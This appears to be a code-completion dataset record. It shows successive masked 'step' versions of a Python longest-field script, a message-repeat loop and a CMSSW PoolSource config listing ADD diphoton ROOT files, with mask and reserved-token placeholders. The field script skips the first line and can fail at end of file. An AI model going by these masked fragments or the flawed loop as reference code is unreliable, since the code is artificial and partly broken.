"step-4": "import sys\nfrom pathlib import Path\n\n\ndef print_usage():\n sys.stderr.write(\n \"\"\"\nFind the length of the biggest line in the file.\nUsage: ./biggestLine <delimiter> <field number - first element is 0> <file path>\n \"\"\"\n )\n\n\ndef main():\n if len(sys.argv) != 4:\n print_usage()\n sys.exit(1)\n delimiter = sys.argv[1]\n field_number = int(sys.argv[2])\n file_path = sys.argv[3]\n my_file = Path(file_path)\n biggest_string = ''\n try:\n with open(my_file, 'r') as f:\n line = f.readline()\n line_num = 0\n while line:\n line_num = line_num + 1\n line = f.readline()\n curr = line.split(delimiter)[field_number]\n if len(curr) > len(biggest_string):\n biggest_string = curr\n print('Processing Line ' + str(line_num), end='\\r')\n except IndexError:\n print('\\nError on line ' + str(line_num))\n except KeyboardInterrupt:\n sys.exit(0)\n except FileNotFoundError:\n sys.stderr.write('file not found')\n sys.exit(1)\n print('biggest string is ' + str(len(biggest_string)) + ' characters')\n\n\nmain()\n",
"step-5": "#!/usr/bin/env python3\nimport sys\nfrom pathlib import Path\n\n\ndef print_usage():\n sys.stderr.write('''\nFind the length of the biggest line in the file.\nUsage: ./biggestLine <delimiter> <field number - first element is 0> <file path>\n ''')\n\n\ndef main():\n if len(sys.argv) != 4:\n print_usage()\n sys.exit(1)\n\n delimiter = sys.argv[1]\n field_number = int(sys.argv[2])\n file_path = sys.argv[3]\n\n my_file = Path(file_path)\n\n biggest_string = \"\"\n try:\n with open(my_file, 'r') as f:\n line = f.readline()\n line_num = 0\n while line:\n line_num = line_num + 1\n line = f.readline()\n curr = line.split(delimiter)[field_number]\n if len(curr) > len(biggest_string):\n biggest_string = curr\n print('Processing Line ' + str(line_num), end='\\r')\n except IndexError:\n print('\\nError on line '+str(line_num))\n except KeyboardInterrupt:\n sys.exit(0)\n except FileNotFoundError:\n sys.stderr.write('file not found')\n sys.exit(1)\n\n print(\"biggest string is \" + str(len(biggest_string)) + \" characters\")\n\n\nmain()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
prompt = "Enter a message and I will repeat it to you: "
message = " "
while message != 'quit':
message = input(prompt)
if message != 'quit':
print(message)
# using the 'flag' variable
prompt = "Enter a message and I will repeat it to you: "
# active is the variable used in this case as flag
active = True
while active:
message = input(prompt)
if message == 'quit':
active = False
else:
print(message)
|
normal
|
{
"blob_id": "1a6f84835ec2f5fbbb064aef2cd872c24eb3839d",
"index": 8717,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile message != 'quit':\n message = input(prompt)\n if message != 'quit':\n print(message)\n<mask token>\nwhile active:\n message = input(prompt)\n if message == 'quit':\n active = False\n else:\n print(message)\n",
"step-3": "prompt = 'Enter a message and I will repeat it to you: '\nmessage = ' '\nwhile message != 'quit':\n message = input(prompt)\n if message != 'quit':\n print(message)\nprompt = 'Enter a message and I will repeat it to you: '\nactive = True\nwhile active:\n message = input(prompt)\n if message == 'quit':\n active = False\n else:\n print(message)\n",
"step-4": "prompt = \"Enter a message and I will repeat it to you: \"\n\nmessage = \" \"\n\nwhile message != 'quit':\n message = input(prompt)\n if message != 'quit':\n print(message)\n\n# using the 'flag' variable\n\nprompt = \"Enter a message and I will repeat it to you: \"\n\n# active is the variable used in this case as flag\n\nactive = True\n\nwhile active:\n message = input(prompt)\n \n if message == 'quit':\n active = False\n else:\n print(message)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
source = cms.Source('PoolSource', fileNames=cms.untracked.vstring(
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root'
))
<|reserved_special_token_1|>
import FWCore.ParameterSet.Config as cms
source = cms.Source('PoolSource', fileNames=cms.untracked.vstring(
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root'
,
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root'
,
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root'
))
<|reserved_special_token_1|>
import FWCore.ParameterSet.Config as cms
source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root',
'/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root',
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root',
)
)
|
flexible
|
{
"blob_id": "aaeca18f3771a6032c0fe51b75502f730c888888",
"index": 9383,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsource = cms.Source('PoolSource', fileNames=cms.untracked.vstring(\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root'\n ,\n 
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root'\n ))\n",
"step-3": "import FWCore.ParameterSet.Config as cms\nsource = cms.Source('PoolSource', fileNames=cms.untracked.vstring(\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root'\n ,\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_13_1_Pwh.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_14_1_1cS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_15_1_dnc.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_16_1_Kh7.root'\n ,\n 
'/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_17_1_Gt5.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_18_1_Bvh.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_19_1_6KB.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_1_1_uAS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_20_1_8Ra.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_21_1_l0p.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_22_1_rCA.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_23_1_Ec0.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_24_1_NtE.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_25_1_QNK.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_2_1_kmn.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_3_1_LIi.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_4_1_Q4Z.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_5_1_ap1.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_6_1_KyS.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_7_1_FQo.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_8_1_MdF.root'\n ,\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_9_1_NrM.root'\n ))\n",
"step-4": "import FWCore.ParameterSet.Config as cms\n\nsource = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_10_1_Kji.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_1_1_oTR.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_2_1_A2c.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_3_1_TNY.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_4_1_F6B.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_5_1_L2p.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_6_1_vz3.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_7_1_c3E.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_8_1_w8E.root',\n '/store/user/skaplan/noreplica/ADDdiPhoton/sherpa/mgg750-2000_Ms3000/sherpaevents_9_1_FNA.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_10_1_KF1.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_11_1_4q7.root',\n '/store/user/hn99/noreplica/ADDdiPhoton/sherpa_morestats/mgg750-2000_Ms3000/sherpaevents_12_1_aQ4.root',\n 